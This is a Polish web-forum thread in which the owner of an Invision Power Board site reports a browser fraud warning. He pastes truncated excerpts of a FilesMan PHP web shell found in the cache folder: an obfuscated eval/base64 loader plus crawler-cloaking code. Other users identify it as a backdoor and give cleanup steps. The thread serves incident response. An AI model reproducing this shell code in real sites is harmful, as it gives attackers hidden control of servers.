Zgłoszony przypadek oszustwa!

[Pandrov]

Witam,

Od lat na moim VPS stoi forum na IPB, aktualnie 3.4.5 ale tez mam nowa licencje na 4.0 i to forum na tym VPS dziala poprawnie (narazie sobie testuje wersje 4), v 3..4.5 ma wygasla licencje, nie przedluzalem jej. Dzis wchodze na swoje forum przez FF i dostaje komuikat:

 

"Zgłoszony przypadek oszustwa! Strona xxxxx została zgłoszona jako przypadek oszustwa i została zablokowana zgodnie z ustawieniami bezpieczeństwa."

 

i sobie mysle co jest, passy do FTP tylko ja mam. Forum latami wisialo i zylo, dzis pierwszy raz cos takiego mam, co robic?

[Macsch15]

Sprawdź czy nie masz infekcji https://www.invisionpower.com/support/kb/_/how-to-clean-your-site-from-infection-r27

[Pandrov]

O kurde, w cache znalazlem takie pliki

- cfg.php

- headers.php

- header.php

 

w header.php np mam to

<?php
$auth_pass = "3fde6bb0541387e4ebdadf7c2ff31123";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKP...

w cfg.php to

<?php
$auth_pass = "f637d8ca348b591e227d77e364b4533b";
$t = 1; // 1 - input / 2 - no input;
$color = "lime";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
$default_use_ajax = true;

if( !empty($_SERVER['HTTP_USER_AGENT']) ) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    foreach($userAgents as $agent)
        if( strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false ) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
}
@session_start();
...

CZYLI TOTALNY SYF

 

Jak to sie tam znalazlo? I czemu w cache? Czy to znaczy ze nawet jak wywale te pliki z cache to one gdzie indziej sa? Szukalem oryginalnych header.php i nie ma czegos takiego, aby cachowalo?

Edytowane 6 Marca 2016 przez Macsch15

[Pandrov]

druga sprawa Macsch15, powiedz czy w cache powinien byc folder o nazwie tmp a w nim takie pliki o nazwach jak np:

minify_calendar_select,ipb_ckeditor,ipb_common,ipb_editor,ipb_login_register,ipb_styles,ipshoutbox.css_e635d0b99c9e49c6f61597af6e8574d3

 

tak sie nazywa caly plik w tym, sa jeszcze podfoldery dwa CSS i URI tam tez takie dlugie nazwy plikow, a w nich krzaki..

[Macsch15]

Backdoor. W cache pewnie dlatego że ten katalog jest zapisywany.

Polecam użyć: http://phpsec.org/projects/phpsecinfo/ a potem zastosować się do zaleceń (musisz mieć dostęp do modyfikacji php.ini).

 

Usuń te pliki, potem zmień hasła do wszystkiego na mocne, skontaktuj się z hostingiem aby sprawdził czy nie było np. jakiegoś logowania na FTP, sprawdź też logi dostępu serwera HTTP i czegoś w stylu:

xxx.xxx.xxx.xxx - - [dd/mm/yyyy:hh:mm:ss -0700] "GET /path/footer.inc.php?act=edit&file=/home​/account/public_html/.htaccess HTTP/1.1" 200 4795 "http://website/path/footer.inc.php?act=filemanager" "Mozilla/5.0..." 

Jeżeli chodzi o katalog tmp, to jest on domyślnie tworzony przez IPB, nie ma w tym nic podejrzanego.

 

Możesz też przeszukać pliki które zawierają base64_decode(), eval() (pewnie będą też pliki od IPB).

 

Bardzo dużo w tym przypadku zależy od zabezpieczeń serwera.

Tak może wyglądać taki backdoor po uruchomieniu

 

PS: Sprawdź czy nie ma podejrzanych plików ponad poziom plików forum.

[Pandrov]

No dobra, a nawet jak bym chcial teraz na nowo sobie pliki postawic w wersji 3.4.5 gdy nie mam przedluzonej licencji to juz nie moge teo zrobic? Nie chce przedluzac licencji 3.4.5 bo mi jest zbedna, nie ma mozliwosci teraz dostac swiezych plikow tej wersji?

[Jurij]

Jedyne sprawdzone i legalne pliki IPB znajdziesz w Client Area.

 

 

Nie chce przedluzac licencji 3.4.5 bo mi jest zbedna

 

Kogo próbujesz oszukać? Nas nie oszukasz, samego siebie chyba tylko. Skoro masz na forum sajgon i potrzebujesz plików, to ergo potrzebujesz licencji aktywnej. Poza tym przy okazji zaktualizujesz sobie forum do wersji 3.4.9 i zyskasz masę aktualizacji, łatek, dostęp do supportu, chata, spam service i edytora wizualnego styli na pół roku